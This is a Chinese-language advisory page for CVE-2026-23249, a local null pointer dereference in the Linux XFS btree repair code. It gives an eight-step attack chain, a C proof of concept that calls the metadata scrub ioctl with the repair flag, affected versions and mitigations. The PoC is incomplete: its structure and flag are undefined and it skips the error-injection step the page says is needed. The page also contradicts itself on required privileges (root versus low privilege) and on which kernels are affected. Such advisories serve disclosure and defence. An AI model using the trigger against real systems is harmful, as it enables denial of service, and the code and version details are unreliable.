CVE-2026-23249: Linux内核XFS文件系统btree修复空指针解引用漏洞

漏洞信息

漏洞编号

CVE-2026-23249

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核XFS文件系统

漏洞概述

CVE-2026-23249是Linux内核中XFS文件系统的一个中等严重性安全漏洞，CVSS评分5.5。该漏洞位于XFS文件系统的元数据修复功能中，具体发生在重新验证两个btrees（BNOBT和CNTBT）时。漏洞的根本原因是在xrep_revalidate_allocbt()函数中，第一次调用xchk_allocbt()检查BNOBT时，由于交叉引用检查失败会将cnt_cur指针置空，但代码未检查该指针状态就直接进行第二次调用检查CNTBT，导致空指针解引用崩溃。此漏洞可被本地低权限用户利用，通过触发特定的XFS文件系统错误来使系统崩溃，造成本地拒绝服务攻击。

技术细节

该漏洞发生在Linux内核XFS文件系统的btree修复代码中。当文件系统元数据损坏时，修复函数会同时重建free space btree（BNOBT和CNTBT）和inode btree。问题出现在xrep_revalidate_allocbt()函数中：该函数需要先后调用xchk_allocbt()两次来验证两个btree的正确性。第一次调用检查BNOBT时，由于sm_type被设置为XFS_SCRUB_TYPE_BNOBT，代码会执行交叉引用检查（xchk_allocbt_xref_other），在此过程中调用xfs_alloc_get_rec()获取记录时返回-EFSCORRUPTED错误，导致xchk_should_check_xref()函数将指向sc->sa.cnt_cur的指针置空。当函数返回后进行第二次调用检查CNTBT时，由于cnt_cur已被置空，在xchk_btree()中触发空指针解引用崩溃。攻击者可通过ioctl$XFS_IOC_ERROR_INJECTION注入错误，或直接触发文件系统损坏状态来利用此漏洞。相同的漏洞模式也存在于xrep_revalidate_iallocbt()函数中。修复方案是在重新验证前检查cursor是否为空，并在第一个树已损坏时跳过第二个树的验证。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限用户身份，访问XFS文件系统

STEP 2

步骤2

通过ioctl$XFS_IOC_ERROR_INJECTION注入文件系统错误，或直接造成文件系统元数据损坏

STEP 3

步骤3

调用XFS_IOC_SCRUB_METADATA ioctl触发元数据修复，传入XFS_SCRUB_FLAG_REPAIR标志

STEP 4

步骤4

进入xrep_revalidate_allocbt()函数，该函数调用xchk_allocbt()检查BNOBT

STEP 5

步骤5

在xchk_allocbt_xref_other()中，由于错误注入导致xfs_alloc_get_rec()返回-EFSCORRUPTED

STEP 6

步骤6

xchk_should_check_xref()函数将sc->sa.cnt_cur指针置空

STEP 7

步骤7

函数返回后，xrep_revalidate_allocbt()再次调用xchk_allocbt()检查CNTBT

STEP 8

步骤8

由于cnt_cur已为空，在xchk_btree()中触发空指针解引用，导致系统崩溃

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2026-23249 PoC - XFS btree repair null pointer dereference
 * This PoC demonstrates triggering the vulnerability through filesystem corruption
 * Note: Requires root privileges and XFS filesystem
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <linux/fs.h>

/* XFS specific ioctl structures would be defined here */
#define XFS_IOC_SCRUB_METADATA _IOWR('X', 124, struct xfs_scrub_metadata)
#define XFS_SCRUB_TYPE_BNOBT 2
#define XFS_SCRUB_TYPE_CNTBT 3

int main(int argc, char *argv[]) {
    int fd;
    struct xfs_scrub_metadata meta = {0};
    
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <xfs_mount_point>\n", argv[0]);
        return 1;
    }
    
    fd = open(argv[1], O_RDONLY);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }
    
    /* Set up scrub metadata structure for BNOBT repair */
    meta.sm_type = XFS_SCRUB_TYPE_BNOBT;
    meta.sm_flags = XFS_SCRUB_FLAG_REPAIR;
    
    /* Trigger the vulnerability by calling scrub with repair flag */
    /* This will cause the first xchk_allocbt call to nullify cnt_cur */
    if (ioctl(fd, XFS_IOC_SCRUB_METADATA, &meta) < 0) {
        perror("Scrub ioctl failed");
    }
    
    close(fd);
    return 0;
}

/* Alternative trigger method using error injection: */
/* ioctl(fd, XFS_IOC_ERROR_INJECTION, XFS_ERR_DEFAULT); */
/* Then trigger metadata scrub to cause the crash */

影响范围

Linux kernel < 5.15.x (具体版本需查看内核稳定版补丁)

Linux kernel < 6.1.x

Linux kernel < 6.6.x

所有启用XFS文件系统的Linux内核版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，可采取以下临时缓解措施：1) 限制非特权用户对XFS文件系统的直接访问权限；2) 监控系统日志中的XFS错误信息；3) 避免在生产环境中对XFS文件系统执行元数据修复操作；4) 使用文件系统只读挂载选项减少意外修改；5) 定期备份重要数据。虽然该漏洞需要本地访问权限，但仍建议尽快应用官方安全补丁进行修复。